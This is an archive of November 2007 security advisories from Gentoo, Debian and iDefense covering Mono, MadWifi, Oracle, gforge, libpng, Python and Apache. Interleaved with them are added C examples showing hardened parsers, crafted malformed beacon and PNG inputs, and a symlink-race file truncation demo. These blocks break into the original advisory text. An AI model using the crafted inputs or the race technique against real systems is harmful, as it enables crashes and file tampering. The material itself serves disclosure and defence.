[ GLSA 200711-10 ] Mono: Buffer overflow

2007-11-07 Thread Pierre-Yves Rofes
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory   GLSA 200711-10
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: High
 Title: Mono: Buffer overflow
  Date: November 07, 2007
  Bugs: #197067
ID: 200711-10

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis


Mono's BigInteger implementation contains a buffer overflow
vulnerability that might lead to the execution of arbitrary code.

Background
==

Mono provides the necessary software to develop and run .NET client and
server applications on various platforms.

Affected packages
=

---
 Package/   Vulnerable   /  Unaffected
---
  1  dev-lang/mono < 1.2.5.1-r1  >= 1.2.5.1-r1

Description
===

IOActive discovered an error in the Mono.Math.BigInteger class, in the
reduction step of the Montgomery-based Pow methods, that could lead to
a buffer overflow.

Impact
==

A remote attacker could exploit this vulnerability by sending specially
crafted data to Mono applications using the BigInteger class, which
might lead to the execution of arbitrary code with the privileges of
the user running the application (possibly root) or a Denial of
Service.

Workaround
==

There is no known workaround at this time.

Resolution
==

All Mono users should upgrade to the latest version:

# emerge --sync
# emerge --ask --oneshot --verbose ">=dev-lang/mono-1.2.5.1-r1"

References
==

  [ 1 ] CVE-2007-5197
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5197

Availability


This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200711-10.xml

Concerns?
=

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
[EMAIL PROTECTED] or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
===

Copyright 2007 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.7 (GNU/Linux)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

iD8DBQFHMkNzuhJ+ozIKI5gRArYjAJ9phAJywZIzP4gaojoMXPBM8GAFOwCgnT87
kIV5YdfDuYixkkHSy5ynoIk=
=Nk3F
-END PGP SIGNATURE-


[ GLSA 200711-09 ] MadWifi: Denial of Service

2007-11-07 Thread Pierre-Yves Rofes
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory   GLSA 200711-09
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
 Title: MadWifi: Denial of Service
  Date: November 07, 2007
  Bugs: #195705
ID: 200711-09

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis


MadWifi does not correctly process beacon frames, which can lead to a
remotely triggered Denial of Service.

Background
==

The MadWifi driver provides support for Atheros based IEEE 802.11
Wireless Lan cards.

Affected packages
=

---
 Package  /  Vulnerable  /  Unaffected
---
  1  net-wireless/madwifi-ng  < 0.9.3.3 >= 0.9.3.3

Description
===

Clemens Kolbitsch and Sylvester Keil reported an error when processing
beacon frames with an overly large "length" value in the "xrates"
element.
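The check that a fix for this class of bug has to add is easiest to see in a small information-element walker. The following is an added example written for this page, not MadWifi code: it parses the tagged elements of a beacon body into a fixed 15-entry per-station rate buffer, and the constant names (RATE_MAXSIZE, the 12-byte fixed header), the error codes and the two sample frames are assumptions constructed for the demonstration. The frame whose rates and xrates together exceed the buffer is rejected rather than copied.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Added example, not MadWifi code.  A beacon body is a 12-byte fixed part
 * (timestamp, beacon interval, capability) followed by tagged information
 * elements: 1 byte ID, 1 byte length, then 'length' bytes.  A driver collects
 * Supported Rates (ID 1) and Extended Supported Rates (ID 50) into a fixed
 * per-station buffer; RATE_MAXSIZE mirrors the 15-entry limit drivers use. */

#define BEACON_FIXED_LEN 12
#define IE_RATES          1
#define IE_XRATES        50
#define RATE_MAXSIZE     15

struct sta_rates {
    uint8_t nrates;
    uint8_t rates[RATE_MAXSIZE];
};

enum { IE_OK = 0, IE_TRUNCATED = -1, IE_TOO_MANY_RATES = -2 };

/* Hardened walker: the attacker-chosen length byte is checked against both
 * the bytes left in the frame and the room left in the destination before
 * anything is copied.  The vulnerable shape copies 'len' bytes into 'rates'
 * without the second check. */
int beacon_collect_rates(const uint8_t *frame, size_t frame_len,
                         struct sta_rates *out)
{
    size_t off = BEACON_FIXED_LEN;

    memset(out, 0, sizeof *out);
    if (frame_len < off)
        return IE_TRUNCATED;

    while (off + 2 <= frame_len) {
        uint8_t id  = frame[off];
        uint8_t len = frame[off + 1];
        const uint8_t *body = frame + off + 2;

        if (len > frame_len - off - 2)              /* IE longer than the frame */
            return IE_TRUNCATED;
        if (id == IE_RATES || id == IE_XRATES) {
            if (len > RATE_MAXSIZE - out->nrates)   /* the check the advisory is about */
                return IE_TOO_MANY_RATES;
            memcpy(out->rates + out->nrates, body, len);
            out->nrates += len;
        }
        off += 2 + (size_t)len;
    }
    return IE_OK;
}

/* Constructed sample frames, not captured traffic.  Rates are in 500 kb/s units. */
static const uint8_t good_beacon[] = {
    0,0,0,0,0,0,0,0, 0x64,0x00, 0x01,0x04,     /* timestamp, interval, capability */
    0x00, 0x04, 'T','E','S','T',                /* SSID */
    0x01, 0x04, 0x82,0x84,0x8b,0x96,            /* rates: 1, 2, 5.5, 11 Mb/s */
    0x32, 0x04, 0x0c,0x12,0x18,0x24,            /* xrates: 6, 9, 12, 18 Mb/s */
};

/* 8 rates + 8 xrates = 16 entries: one more than the 15-byte buffer holds. */
static const uint8_t evil_beacon[] = {
    0,0,0,0,0,0,0,0, 0x64,0x00, 0x01,0x04,
    0x00, 0x04, 'T','E','S','T',
    0x01, 0x08, 0x82,0x84,0x8b,0x96,0x0c,0x12,0x18,0x24,
    0x32, 0x08, 0x30,0x48,0x60,0x6c,0x0c,0x12,0x18,0x24,
};

/* Wrappers with scalar results so each scenario can be checked directly. */
int check_good_beacon(void)
{
    struct sta_rates r;
    int rc = beacon_collect_rates(good_beacon, sizeof good_beacon, &r);
    return rc == IE_OK ? r.nrates : rc;
}

int check_evil_beacon(void)
{
    struct sta_rates r;
    return beacon_collect_rates(evil_beacon, sizeof evil_beacon, &r);
}

int check_cut_beacon(void)   /* last two bytes missing: xrates IE overruns the frame */
{
    struct sta_rates r;
    return beacon_collect_rates(good_beacon, sizeof good_beacon - 2, &r);
}

int main(void)
{
    printf("good: %d rates, evil: %d, cut: %d\n",
           check_good_beacon(), check_evil_beacon(), check_cut_beacon());
    return 0;
}
```

The two rejections come from different checks: the cut frame fails the frame-length test (the element claims bytes the packet does not carry), while the 8+8 frame is well-formed on the air and fails only the destination-room test, which is the one a driver is most likely to forget because each individual element is within its own 255-byte limit.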

Impact
==

A remote attacker could act as an access point and send a specially
crafted packet to an Atheros based wireless client, possibly resulting
in a Denial of Service (kernel panic).

Workaround
==

There is no known workaround at this time.

Resolution
==

All MadWifi users should upgrade to the latest version:

# emerge --sync
# emerge --ask --oneshot --verbose ">=net-wireless/madwifi-ng-0.9.3.3"

References
==

  [ 1 ] CVE-2007-5448
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5448

Availability


This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200711-09.xml

Concerns?
=

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
[EMAIL PROTECTED] or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
===

Copyright 2007 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.7 (GNU/Linux)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

iD8DBQFHMiNtuhJ+ozIKI5gRAoxqAKCEmLB5pbn+EQSnNvbJAcoMe3XbGwCgoeyZ
9aD3ruieUHJOEeCYrR/ihTs=
=7I0H
-END PGP SIGNATURE-


iDefense Security Advisory 11.07.07: Oracle 10g R2 PITRIG_DROPMETADATA Buffer Overflow Vulnerability

2007-11-07 Thread iDefense Labs
iDefense Security Advisory 11.07.07
http://labs.idefense.com/intelligence/vulnerabilities/
Nov 07, 2007

I. BACKGROUND

Oracle Database Server is a family of database products that range from
personal databases to enterprise solutions. Further information is
available at the following URL.

http://www.oracle.com/database/index.html

II. DESCRIPTION

Remote exploitation of a buffer overflow in the
XDB.XDB_PITRIG_PKG.PITRIG_DROPMETADATA procedure in Oracle Corp.'s
Database 10gR2 could allow a user with an authenticated session to
execute arbitrary code in the context of the database account.

The XDB_PITRIG_PKG.PITRIG_DROPMETADATA procedure takes two arguments,
OWNER and NAME. An internal function uses these values to construct a
SQL query without adequately validating their lengths. If the combined
length of the two arguments is too large, a buffer overflow occurs,
allowing arbitrary code execution.

III. ANALYSIS

Exploitation of this vulnerability allows an authenticated remote user
to execute code on the underlying system in the context of the database
account. Other than access to execute the vulnerable function, this
vulnerability does not require any special privileges. From the
database user account, an attacker can then access or modify the
database and files related to its operation.

IV. DETECTION

iDefense has confirmed this vulnerability on Oracle Database 10g Release
2 with all Critical Patch Updates as of February 2007. Previous versions
are suspected to be vulnerable.

V. WORKAROUND

iDefense is not aware of any effective workaround for this
vulnerability.

VI. VENDOR RESPONSE

Oracle Corp. has been contacted and stated the following.

" Tracking #: 9219583 Description: BUFFER OVERFLOW IN
XDB.XDB_PITRIG_PKG.PITRIG_DROPMETADATA Status: Issue fixed in main
codeline, scheduled for a future CPU "

VII. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has assigned the
name CVE-2007-4517 to this issue. This is a candidate for inclusion in
the CVE list (http://cve.mitre.org/), which standardizes names for
security problems.

VIII. DISCLOSURE TIMELINE

02/01/2007  Initial vendor notification
02/01/2007  Initial vendor response
11/07/2007  Public disclosure

IX. CREDIT

The discoverer of this vulnerability wishes to remain anonymous.

Get paid for vulnerability research
http://labs.idefense.com/methodology/vulnerability/vcp.php

Free tools, research and upcoming events
http://labs.idefense.com/

X. LEGAL NOTICES

Copyright © 2007 iDefense, Inc.

Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without the express
written consent of iDefense. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically,
please e-mail [EMAIL PROTECTED] for permission.

Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
 There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct,
indirect, or consequential loss or damage arising from use of, or
reliance on, this information.


[SECURITY] [DSA 1402-1] New gforge packages fix several vulnerabilities

2007-11-07 Thread Steve Kemp
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- 
Debian Security Advisory DSA-1402-1  [EMAIL PROTECTED]
http://www.debian.org/security/   Steve Kemp
November 07, 2007 http://www.debian.org/security/faq
- 

Package: gforge
Vulnerability  : insecure temporary files
Problem type   : local
Debian-specific: no
CVE Id(s)  : CVE-2007-3921

Steve Kemp from the Debian Security Audit project discovered that gforge,
a collaborative development tool, used temporary files insecurely, which
could allow local users to truncate files on the system with the privileges
of the gforge user, or cause a denial of service.
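The symlink race behind an insecure temporary file, and the two ways to close it, as an added example. This is not gforge code (gforge is written in PHP); it is C so that the open() flags that matter are visible. The scratch directory under /tmp, the file names and the victim contents are constructed for the demonstration, and nothing outside that directory is touched.

```c
#define _GNU_SOURCE
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* Added example, not gforge code.  Builds a scratch directory holding a
 * "victim" file and an attacker-placed symlink at the predictable temporary
 * path the program is about to use, then shows what each way of opening that
 * path does to the victim.  Nothing outside the scratch directory is touched. */

#define VICTIM_CONTENT "important data"          /* 14 bytes */

static int setup_scenario(char *dir, char *victim, char *lnk)
{
    strcpy(dir, "/tmp/tmpfile-demo-XXXXXX");
    if (!mkdtemp(dir)) {                         /* fall back to the cwd */
        strcpy(dir, "./tmpfile-demo-XXXXXX");
        if (!mkdtemp(dir))
            return -1;
    }
    snprintf(victim, 256, "%s/victim", dir);
    snprintf(lnk, 256, "%s/predictable.tmp", dir);
    FILE *f = fopen(victim, "w");
    if (!f)
        return -1;
    fputs(VICTIM_CONTENT, f);
    fclose(f);
    return symlink(victim, lnk);                 /* the attacker's move */
}

static void teardown_scenario(const char *dir, const char *victim, const char *lnk)
{
    unlink(lnk); unlink(victim); rmdir(dir);
}

static long file_size(const char *path)
{
    struct stat st;
    return stat(path, &st) == 0 ? (long)st.st_size : -1;
}

/* Vulnerable pattern: fixed name, O_CREAT without O_EXCL, symlink followed.
 * Returns the victim's size afterwards; 0 means it was truncated through the
 * symlink with this process's privileges (-1 if setup failed). */
long scenario_unsafe(void)
{
    char dir[256], victim[256], lnk[256];
    if (setup_scenario(dir, victim, lnk) != 0)
        return -1;
    int fd = open(lnk, O_WRONLY | O_CREAT | O_TRUNC, 0600);
    if (fd >= 0)
        close(fd);
    long size = file_size(victim);
    teardown_scenario(dir, victim, lnk);
    return size;
}

/* Hardened open for a fixed path: O_EXCL fails on any pre-existing entry
 * (EEXIST, a symlink included) and O_NOFOLLOW refuses a symlink as the final
 * component (ELOOP).  Returns the victim's size afterwards, which must be
 * unchanged; -2 if the open unexpectedly succeeded. */
long scenario_safe_fixed_name(void)
{
    char dir[256], victim[256], lnk[256];
    if (setup_scenario(dir, victim, lnk) != 0)
        return -1;
    int fd = open(lnk, O_WRONLY | O_CREAT | O_EXCL | O_NOFOLLOW, 0600);
    long size = fd >= 0 ? -2 : file_size(victim);
    if (fd >= 0)
        close(fd);
    teardown_scenario(dir, victim, lnk);
    return size;
}

/* Preferred: mkstemp() picks an unpredictable name and creates it with
 * O_EXCL in one step, so there is no path for the attacker to pre-place.
 * Returns 1 if a fresh regular file was created and the victim is intact. */
int scenario_mkstemp(void)
{
    char dir[256], victim[256], lnk[256], tmpl[256];
    if (setup_scenario(dir, victim, lnk) != 0)
        return -1;
    snprintf(tmpl, sizeof tmpl, "%s/upload-XXXXXX", dir);
    int fd = mkstemp(tmpl), ok = 0;
    if (fd >= 0) {
        struct stat st;
        ok = fstat(fd, &st) == 0 && S_ISREG(st.st_mode) && st.st_nlink == 1
             && file_size(victim) == (long)strlen(VICTIM_CONTENT);
        close(fd);
        unlink(tmpl);
    }
    teardown_scenario(dir, victim, lnk);
    return ok;
}
```

Calling scenario_unsafe() returns 0 (the victim was emptied), scenario_safe_fixed_name() returns 14 (the open failed and the victim is untouched) and scenario_mkstemp() returns 1. The fixed-name variant with O_EXCL|O_NOFOLLOW is only an improvement if the program copes with the EEXIST failure; mkstemp() avoids the question because there is no name to guess.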

For the stable distribution (etch), this problem has been fixed in version
4.5.14-22etch3.

For the old stable distribution (sarge), this problem has been fixed in
version 3.1-31sarge4.

We recommend that you upgrade your gforge package.


Upgrade instructions
- 

wget url
will fetch the file for you
dpkg -i file.deb
will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
will update the internal database
apt-get upgrade
will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 3.1 alias sarge
- 

Source archives:

  http://security.debian.org/pool/updates/main/g/gforge/gforge_3.1-31sarge4.dsc
Size/MD5 checksum:  868 4005b2a103656a62f38e1786a227b1d0
  http://security.debian.org/pool/updates/main/g/gforge/gforge_3.1.orig.tar.gz
Size/MD5 checksum:  1409879 c723b3a9efc016fd5449c4765d5de29c
  
http://security.debian.org/pool/updates/main/g/gforge/gforge_3.1-31sarge4.diff.gz
Size/MD5 checksum:   297962 8fd56957c8fbab462ac619339c2f00d3

Architecture independent packages:

  
http://security.debian.org/pool/updates/main/g/gforge/sourceforge_3.1-31sarge4_all.deb
Size/MD5 checksum:55884 f4b7e0aee840e3574a0febf1615070be
  
http://security.debian.org/pool/updates/main/g/gforge/gforge-ldap-openldap_3.1-31sarge4_all.deb
Size/MD5 checksum:70804 967a22a70e3ee974962073ab74cfb980
  
http://security.debian.org/pool/updates/main/g/gforge/gforge-shell-ldap_3.1-31sarge4_all.deb
Size/MD5 checksum:61044 7b10ab898c539af9aa118b38fcd77843
  
http://security.debian.org/pool/updates/main/g/gforge/gforge-dns-bind9_3.1-31sarge4_all.deb
Size/MD5 checksum:72508 7ad6f5e0672cbb256fd12f270130adc6
  
http://security.debian.org/pool/updates/main/g/gforge/gforge_3.1-31sarge4_all.deb
Size/MD5 checksum:56432 fc8ee68a79928b0833e2a183228a3493
  
http://security.debian.org/pool/updates/main/g/gforge/gforge-sourceforge-transition_3.1-31sarge4_all.deb
Size/MD5 checksum:59388 d0db9082a30227f4b9b60491d58a8c78
  
http://security.debian.org/pool/updates/main/g/gforge/gforge-cvs_3.1-31sarge4_all.deb
Size/MD5 checksum:99248 6fb788e20a56a3b39688723a1c285680
  
http://security.debian.org/pool/updates/main/g/gforge/gforge-ftp-proftpd_3.1-31sarge4_all.deb
Size/MD5 checksum:59914 79c5932a61e0382017da8e1893307e66
  
http://security.debian.org/pool/updates/main/g/gforge/gforge-db-postgresql_3.1-31sarge4_all.deb
Size/MD5 checksum:   148476 e22948a815a5ffa5b4c829b926f04d8c
  
http://security.debian.org/pool/updates/main/g/gforge/gforge-common_3.1-31sarge4_all.deb
Size/MD5 checksum:93924 12005d816bb895cb93c3add804d137bf
  
http://security.debian.org/pool/updates/main/g/gforge/gforge-mta-postfix_3.1-31sarge4_all.deb
Size/MD5 checksum:64834 bea186826f61ae4b1d473d45d2821538
  
http://security.debian.org/pool/updates/main/g/gforge/gforge-mta-exim4_3.1-31sarge4_all.deb
Size/MD5 checksum:65198 b17e85bb88554d2e083d9dcb799e6da7
  
http://security.debian.org/pool/updates/main/g/gforge/gforge-web-apache_3.1-31sarge4_all.deb
Size/MD5 checksum:  1108056 f812bd185a9dede06dec099e9abaa335
  
http://security.debian.org/pool/updates/main/g/gforge/gforge-lists-mailman_3.1-31sarge4_all.deb
Size/MD5 checksum:58298 c3abd99679008d3919d59e373589d8cd
  
http://security.debian.org/pool/updates/main/g/gforge/gforge-mta-exim_3.1-31sarge4_all.deb
Size/MD5 checksum:64732 941c0d9bc65f37e3e8860adf3181a3fc


Debian GNU/Linux 4.0 alias etch
- ---

Source archives:

  
http://security.debian.org/pool/updates/main/g/gforge/gforge_4.5.14-22etch3.dsc
Size/MD5 checksum:  950 6099abb16f573f57a3bef4a5fec2df30
  
http://security.debian.org/pool/updates/main/g/gforge/gforge_4.5.14-22etch3.diff.gz
Size/MD5 checksum:   196475 94131f4f4040768e173c4568894f052f
  
http://security.debian.org/pool/updates/main/g/gforge/gforge_4.5.14.orig.tar.gz
Size/MD5 checksum

[ GLSA 200711-08 ] libpng: Multiple Denials of Service

2007-11-07 Thread Pierre-Yves Rofes
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory   GLSA 200711-08
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
 Title: libpng: Multiple Denials of Service
  Date: November 07, 2007
  Bugs: #195261
ID: 200711-08

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis


Several vulnerabilities in libpng may allow a remote attacker to crash
applications that handle untrusted images.

Background
==

libpng is a free ANSI C library used to process and manipulate PNG
images.

Affected packages
=

---
 Package/   Vulnerable   /  Unaffected
---
  1  media-libs/libpng  < 1.2.21-r3   >= 1.2.21-r3

Description
===

An off-by-one error when handling ICC profile chunks in the
png_set_iCCP() function was discovered (CVE-2007-5266). George Cook and
Jeff Phillips reported several errors in pngrtran.c, namely the use of
logical instead of bitwise operators and incorrect comparisons
(CVE-2007-5268). Tavis Ormandy reported out-of-bounds read errors in
several PNG chunk handling functions (CVE-2007-5269).
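The boundaries inside an iCCP chunk, and the logical-versus-bitwise mistake, as an added example that is not libpng code. The chunk layout follows the PNG specification (profile name of 1 to 79 bytes, NUL, compression method, compressed profile); the error codes, the 80-byte name buffer and the constructed chunk builder are the example's own.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Added example, not libpng code.  Per the PNG specification an iCCP chunk
 * is: profile name (1 to 79 Latin-1 bytes), a NUL separator, one compression
 * method byte (only 0 is defined), then the compressed ICC profile.  Every
 * boundary in that layout is checked before a byte is read or copied. */

#define ICCP_NAME_MAX 79

enum {
    ICCP_OK            =  0,
    ICCP_NO_TERMINATOR = -1,   /* no NUL within the first 80 bytes / the chunk */
    ICCP_EMPTY_NAME    = -2,
    ICCP_TRUNCATED     = -3,   /* no room for the compression method byte */
    ICCP_BAD_METHOD    = -4
};

struct iccp {
    char           name[ICCP_NAME_MAX + 1];   /* +1 for the NUL: the classic off-by-one */
    uint8_t        method;
    const uint8_t *profile;
    size_t         profile_len;
};

int parse_iccp(const uint8_t *data, size_t len, struct iccp *out)
{
    /* Scan for the separator only within bytes that exist, and never past
     * the 79-byte name limit (a NUL at index 80 would mean an 80-byte name). */
    size_t limit = len < ICCP_NAME_MAX + 1 ? len : ICCP_NAME_MAX + 1;
    size_t name_len = 0;

    while (name_len < limit && data[name_len] != 0)
        name_len++;
    if (name_len == limit)
        return ICCP_NO_TERMINATOR;
    if (name_len == 0)
        return ICCP_EMPTY_NAME;
    if (len < name_len + 2)
        return ICCP_TRUNCATED;
    if (data[name_len + 1] != 0)
        return ICCP_BAD_METHOD;

    memcpy(out->name, data, name_len);
    out->name[name_len] = '\0';
    out->method      = data[name_len + 1];
    out->profile     = data + name_len + 2;
    out->profile_len = len - (name_len + 2);
    return ICCP_OK;
}

/* Bitwise test of the PNG "ancillary" flag, bit 5 of the first type byte.
 * Written as 'type && 0x20000000u' (logical AND) it would be true for every
 * chunk; that operator mix-up is the class of bug behind CVE-2007-5268. */
int chunk_is_ancillary(uint32_t type)
{
    return (type & 0x20000000u) != 0;
}

/* Builds a constructed iCCP body: name_len 'A's, NUL, method 0, then
 * profile_len bytes of 0xEE.  Returns the total length. */
static size_t build_iccp(uint8_t *buf, size_t name_len, size_t profile_len)
{
    memset(buf, 'A', name_len);
    buf[name_len] = 0;
    buf[name_len + 1] = 0;
    memset(buf + name_len + 2, 0xEE, profile_len);
    return name_len + 2 + profile_len;
}

/* Parses a constructed chunk with 'chop' bytes cut off the end; returns the
 * profile length on success or the negative error code. */
int check_iccp(size_t name_len, size_t profile_len, size_t chop)
{
    uint8_t buf[256];
    struct iccp p;
    size_t n = build_iccp(buf, name_len, profile_len);
    int rc = parse_iccp(buf, n - chop, &p);
    return rc == ICCP_OK ? (int)p.profile_len : rc;
}

int main(void)
{
    printf("17-byte name: %d, 79-byte name: %d, 80-byte name: %d, cut: %d\n",
           check_iccp(17, 4, 0), check_iccp(79, 1, 0),
           check_iccp(80, 1, 0), check_iccp(3, 0, 1));
    printf("IHDR ancillary? %d  iCCP ancillary? %d\n",
           chunk_is_ancillary(0x49484452u), chunk_is_ancillary(0x69434350u));
    return 0;
}
```

The 79-byte name is accepted and the 80-byte name is refused: that single byte is where an off-by-one in the limit, or a name buffer sized without the NUL, turns into a heap write past the allocation.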

Impact
==

A remote attacker could craft an image that when processed or viewed by
an application using libpng would cause the application to terminate
abnormally.

Workaround
==

There is no known workaround at this time.

Resolution
==

All libpng users should upgrade to the latest version:

# emerge --sync
# emerge --ask --oneshot --verbose ">=media-libs/libpng-1.2.21-r3"

References
==

  [ 1 ] CVE-2007-5266
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5266
  [ 2 ] CVE-2007-5268
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5268
  [ 3 ] CVE-2007-5269
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5269

Availability


This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200711-08.xml

Concerns?
=

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
[EMAIL PROTECTED] or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
===

Copyright 2007 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.7 (GNU/Linux)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

iD8DBQFHMhzjuhJ+ozIKI5gRAvvcAJ9POnVZo+5eGaeH6xELJSZhC6eeuwCffECb
KS8p+WDYlscGB/Ry4EVHkuc=
=nG1m
-END PGP SIGNATURE-


[ GLSA 200711-07 ] Python: User-assisted execution of arbitrary code

2007-11-07 Thread Pierre-Yves Rofes
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory   GLSA 200711-07
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
 Title: Python: User-assisted execution of arbitrary code
  Date: November 07, 2007
  Bugs: #192876
ID: 200711-07

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis


Multiple integer overflow vulnerabilities have been discovered in
Python, possibly resulting in the execution of arbitrary code or a
Denial of Service.

Background
==

Python is an interpreted, interactive, object-oriented programming
language.

Affected packages
=

---
 Package  /  Vulnerable  /  Unaffected
---
  1  dev-lang/python          < 2.4.4-r6             *>= 2.3.6-r3
                                                      >= 2.4.4-r6

Description
===

Slythers Bro discovered multiple integer overflows in the imageop
module, one of them in the tovideo() method, at various locations in
imageop.c, rgbimgmodule.c and other files.

Impact
==

A remote attacker could entice a user to process specially crafted
images with an application using the Python imageop module, resulting
in the execution of arbitrary code with the privileges of the user
running the application, or a Denial of Service. Note that this
vulnerability may or may not be exploitable, depending on the
application using the module.

Workaround
==

There is no known workaround at this time.

Resolution
==

All Python 2.3.x users should upgrade to the latest version:

# emerge --sync
# emerge --ask --oneshot --verbose ">=dev-lang/python-2.3.6-r3"

All Python 2.4.x users should upgrade to the latest version:

# emerge --sync
# emerge --ask --oneshot --verbose ">=dev-lang/python-2.4.4-r6"

References
==

  [ 1 ] CVE-2007-4965
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4965

Availability


This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200711-07.xml

Concerns?
=

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
[EMAIL PROTECTED] or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
===

Copyright 2007 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.7 (GNU/Linux)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

iD8DBQFHMhXduhJ+ozIKI5gRAu7QAJwLWN/dJhfYHj0cd47/vpLD0CmT0wCgiL7v
CQwkunJwxuLtxFVunazbM90=
=ebkp
-END PGP SIGNATURE-


[ GLSA 200711-06 ] Apache: Multiple vulnerabilities

2007-11-07 Thread Pierre-Yves Rofes
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory   GLSA 200711-06
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
 Title: Apache: Multiple vulnerabilities
  Date: November 07, 2007
  Bugs: #186219
ID: 200711-06

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis


Multiple vulnerabilities have been discovered in Apache, possibly
resulting in a Denial of Service or the disclosure of sensitive
information.

Background
==

The Apache HTTP server is one of the most popular web servers on the
Internet.

Affected packages
=

---
 Package /  Vulnerable  /   Unaffected
---
  1  www-servers/apache       < 2.2.6                *>= 2.0.59-r5
                                                      >= 2.2.6

Description
===

Multiple cross-site scripting vulnerabilities have been discovered in
mod_status and mod_autoindex (CVE-2006-5752, CVE-2007-4465). An error
has been discovered in the recall_headers() function in mod_mem_cache
(CVE-2007-1862). The mod_cache module does not properly sanitize
requests before processing them (CVE-2007-1863). The Prefork module
does not properly check PID values before sending signals
(CVE-2007-3304). The mod_proxy module does not correctly check headers
before processing them (CVE-2007-3847).

Impact
==

A remote attacker could exploit one of these vulnerabilities to inject
arbitrary script or HTML content, obtain sensitive information or cause
a Denial of Service.

Workaround
==

There is no known workaround at this time.

Resolution
==

All Apache users should upgrade to the latest version:

# emerge --sync
# emerge --ask --oneshot --verbose ">=www-servers/apache-2.0.59-r5"

References
==

